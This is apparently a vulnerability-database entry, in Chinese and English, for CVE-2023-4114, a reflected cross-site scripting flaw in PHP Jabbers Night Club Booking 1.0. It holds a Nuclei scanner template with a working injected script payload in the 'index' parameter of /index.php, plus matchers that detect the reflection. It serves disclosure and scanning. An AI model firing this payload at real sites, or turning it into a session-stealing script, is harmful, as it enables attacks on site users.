CVE-2023-4114: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: PHP Jabbers Night Club Booking 1.0 | POC: 已公开

漏洞描述

A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

PoC代码[已公开]

id: CVE-2023-4114

info:
  name: PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39749
    - http://packetstormsecurity.com/files/173932/PHPJabbers-Night-Club-Booking-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4114
    - https://vuldb.com/?ctiid.235961
    - https://vuldb.com/?id.235961
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4114
    cwe-id: CWE-79
    epss-score: 0.07829
    epss-percentile: 0.91658
    cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: night_club_booking_software
  tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&date="

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "Drinks & Extras", "Checkout", "><script>alert(document.domain)</script>")'
        condition: and
# digest: 4b0a00483046022100d5ac2d9da1e27a390059e784f8202d46b1e6f6a3765ccf2e391c6a24bc327f50022100d24a548c344e765a50c178437547411997bd2471505b40b9877d70b40b39986f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐